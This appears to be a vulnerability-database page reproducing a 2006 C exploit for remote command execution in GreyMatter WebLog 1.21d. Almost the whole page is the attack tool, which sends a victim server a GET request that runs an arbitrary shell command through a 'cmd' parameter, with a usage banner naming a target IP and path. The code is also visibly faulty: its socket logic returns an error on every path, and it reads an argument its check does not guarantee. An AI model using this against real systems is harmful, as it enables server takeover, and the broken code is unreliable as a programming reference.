GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1)

🗓️ 01 Jul 2014 00:00:00Reported by RootType
GreyMatter WebLog <= 1.21d Remote Command Executio

                                                #include &#60;stdio.h&#62;
#include &#60;windows.h&#62;
#include &#60;winsock2.h&#62;
#define RETCONNERR            4                        // Connection error
#define RETSOCKERR            3                        // Return for socket error
#define RETRESVERR            2                        // Error code for cannot resolve host
#define RETOK                 1                        // Return OK
#pragma comment(lib,&#34;wsock32&#34;)
#define portnum 80
int info(char *ls1);
int ConnectWithString(char *hostname,char *string);
int main(int argc,char **argv){
    char buff[512]=&#34;&#34;;
    char get[1024]=&#34;&#34;;
    if(argc&#60;3)
        {
            info(argv[0]);
            return 0;
        }
    strcpy(buff,argv[2]);
    strcat(buff,&#34;?cmd=&#34;);
    strcat(buff,argv[3]);
    strcpy(get,&#34;GET &#34;);
    strcat(get,buff);
    strcat(get,&#34; HTTP/1.1&#34;);
    printf(&#34;%s\n&#34;,get);
    ConnectWithString(argv[1],get);
    return 0;
}
int ConnectWithString(char *hostname,char *string)
{
    // Socket handle
    WSADATA wsda;

    // Socket file descriptor
    int sockfd;

    // host entrie
    struct hostent *h;

    // Server struct
    struct sockaddr_in server;

    // Return value
    int ret;

    // Initialize socket
    WSAStartup(0x0101, &wsda);

    // Open a socket
    // Create tcp socket
        if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
            return RETSOCKERR;

    // Cannot create socket if anything fails
    else
        return RETSOCKERR;

    // Resolve host
    if((h=gethostbyname(hostname)) == NULL)
            return RETRESVERR;

    // Init server struct
    server.sin_addr=*((struct in_addr*)h-&#62;h_addr);
    server.sin_port=htons(portnum);
    server.sin_family=AF_INET;

    // Connect with server
    if(connect(sockfd, (struct sockaddr*)&server, sizeof(struct sockaddr)) == -1)
        return RETCONNERR;

    // Send string
    ret = send(sockfd, string, strlen(string), 0);

    // Check for socket error
    if(ret == SOCKET_ERROR)
        return RETSOCKERR;

    // Cleanup socket
    WSACleanup();

    closesocket(sockfd);

    // Everything OK

    return RETOK;
}
int info(char *ls1){
    printf(&#34;******************************************************************\n&#34;);
    printf(&#34;*          GREYMATTER Exploit  private version                   *\n&#34;);
    printf(&#34;*         Exploit By:No_Face_King Bug By:syst3m_f4ult            *\n&#34;);
    printf(&#34;*    www.crouz.com Great iranian security team                   *\n&#34;);
    printf(&#34;*      Usage: %s VictimIP  GREYMATTER Path  command  *\n&#34;,ls1);
    printf(&#34;*   e.g: %s 192.168.0.1  /00000008.php  uname -a     *\n&#34;,ls1);
    printf(&#34;******************************************************************\n&#34;);
    return 0;
}

// milw0rm.com [2006-03-28]
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1